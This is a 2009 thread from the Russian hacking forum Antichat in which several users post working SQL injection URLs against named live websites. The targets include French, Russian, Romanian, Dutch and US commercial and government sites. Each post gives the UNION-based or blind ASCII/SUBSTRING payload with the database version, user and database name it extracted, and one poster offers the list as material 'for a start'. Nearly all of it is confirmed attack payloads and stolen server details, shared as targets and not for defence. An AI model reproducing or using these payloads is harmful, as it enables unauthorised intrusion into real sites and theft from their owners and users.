ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8081  
Старый 01.03.2009, 15:10
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.bmwstyle.ru/bmw.php?module=news&news_type=cur_id&news_id=-1+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5--
Database Version : 5.0.67-0ubuntu6
Database name : www_bmwstyle_ru
User name : bmwstyle@localhost
 
Ответить с цитированием

  #8082  
Старый 01.03.2009, 15:35
Аватар для S0ulVortex
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

paraisobahamas.com PR=3

Код:
http://paraisobahamas.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 4.1.22-standard-log
user: paraisob_admin@localhost
database: paraisob_cms
 
Ответить с цитированием

Продолжение славного дела:)
  #8083  
Старый 01.03.2009, 17:18
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию Продолжение славного дела:)

Продолжение славного дела

Код:
http://www.danishdesignwatches.eu/prod_detail.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(version(),user(),database()),8,9,10,11,12,13,14,15,16,17--
версия/юзер/бд:

Код:
26872admin@10.0.5.615.0.51a-3ubuntu5.126872admin
----------------------------------------------------------

Код:
http://www.granietbeurs.nl/website.php?id=-1+union+all+select+convert(concat_ws(version(),user(),database())+using+latin1)--
версия/юзер/бд:

Код:
dagranietb_gran@localhost4.1.12-standard-logdagranietb_gran
----------------------------------------------------------

Код:
http://www.spsrasd.info/fr/detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7--
версия/юзер/бд:

Код:
spsrasd@localhost5.0.58cms
---------------------------------------------------------

Код:
http://www.digitaccess.fr/category.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
версия/юзер/бд:

Код:
digit93@localhost5.0.27digitaccess

--------------------------------------------------------

Код:
http://www.cmgolf.fr/product.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9--
версия/юзер/бд:

Код:
my67521@62.193.203.2265.0.32-Debian_7etch6-logmy67521
-------------------------------------------------------

Код:
http://www.serema.fr/produit.php?id=-1+union+all+select+0,1,convert(concat_ws(version(),user(),database())+using+latin1),3,4,5,6--
версия/юзер/бд:

смотрим в свойствах картинки

Код:
serema@localhost4.1.10aserema_fr
--------------------------------------------------

Код:
http://www.eliotrope.fr/theme.php?id=-1+union+all+select+0,concat_ws(version(),user(),database())--
версия/юзер/бд:

Код:
elio_trope@localhost5.0.32-Debian_7etch8-logeliotrope_base
---------------------------------------------------------

Код:
http://www.fetedelamusique.culture.fr/page.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7--
версия/юзер/бд:

Код:
musique@euterpe.culture.fr5.0.45-Max-logmusique
--------------------------------------------------------

Код:
http://design-facade.fr/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7--
версия/юзер/бд:

Код:
designfa@10.0.75.124.0.25-standard-logdesignfa
--------------------------------------------------------

Код:
http://www.cshm-schm.ca/fr/event.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--
версия/юзер/бд:

Код:
cshm@localhost5.0.27cshm
Думаю на первое время вам хватит
-----------------------------------------------------
The End!

Последний раз редактировалось -m0rgan-; 01.03.2009 в 17:21..
 
Ответить с цитированием

  #8084  
Старый 01.03.2009, 17:29
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Pagerank: 6
тИЦ: 2300


Код:
http://www.sibfair.ru/?current=262&nid=-1+union+select+1,aes_ decrypt(aes_encrypt( concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4,5,6--
Database Version : 4.1.16
Database name : fair
User name : fair@localhost
 
Ответить с цитированием

  #8085  
Старый 01.03.2009, 18:43
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.capitaneanubebi.ro/Web/cjasbr/pagina.php?id=-3+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19/*



Database Version: 5.0.45-log
Database name: cjasbr
User name: cjasbr@core3.hostbase.net
 
Ответить с цитированием

  #8086  
Старый 01.03.2009, 19:03
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.webwisesage.com/maxwrite/diarypage.php?did=-9999999999999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17
user():database():version()
xwebwisesage@serenity.futurequest.net:xwebwisesage-wws:4.0.2


Это уязвимый двиг: http://forum.antichat.ru/showpost.php?p=1144179&postcount=98
PS: Сорри, не увидел, что openwds уже был...

Последний раз редактировалось mailbrush; 01.03.2009 в 19:17..
 
Ответить с цитированием

  #8087  
Старый 01.03.2009, 19:16
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.voxmarsign.ro/produse-detalii.php?id=-54+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--&t=8



Database Version: 5.0.45-log
Database name: voxmar_sign
User name: voxmar_sign@core3.hostbase.net
 
Ответить с цитированием

  #8088  
Старый 01.03.2009, 19:22
Аватар для S0ulVortex
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

www.fresno-shopping.com PR=2

Код:
http://www.fresno-shopping.com/news.php?ax=v&n=13&id=8&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 4.1.22-standard-log
user: fresnosh_user@localhost
database: fresnosh_cms

www.manchester-center.com PR=4


Код:
http://www.manchester-center.com/news.php?ax=v&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
version: 4.1.22-standard
user: manchest_user@localhost
database: manchest_cms
 
Ответить с цитированием

  #8089  
Старый 01.03.2009, 19:24
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.robkall.com/maxwrite/diarypage.php?did=-999999+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
user:database:version
opednews_vidya@localhostpednews_pearl:4.1.22-standard-log


Код:
http://www.awakeningpath.com/maxw/diarypage.php?did=-999999999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17
user:database:version
xawakeningpath@hugo.futurequest.net:xawakeningpath-awaken:5.0.70-log
 
Ответить с цитированием

  #8090  
Старый 01.03.2009, 20:30
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.continentalhotels.ro/index.php?page=hotel&id_hotel=3+AND+ASCII(SUBSTRIN G((select+version()),1,1))>x--

x=52,46,49,46,50,48,45,108,111,103


http://www.continentalhotels.ro/index.php?page=hotel&id_hotel=3+AND+ASCII(SUBSTRIN G((select+database()),1,1))>x--

x=115,104,99,111,110,116,105,110,101,110,116,97,10 8,104,111,116,101,108,115,114,111


http://www.continentalhotels.ro/index.php?page=hotel&id_hotel=3+AND+ASCII(SUBSTRIN G((select+user()),1,1))>x--

x=99,111,110,116,105,110,101,110,116,97,108,104,11 1,114,111,64,56,53,46,57,46,50,50,46,50,51,54

Version : 4.1.20-log
Database : shcontinentalhotelsro
User : continentalhoro@85.9.22.236
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ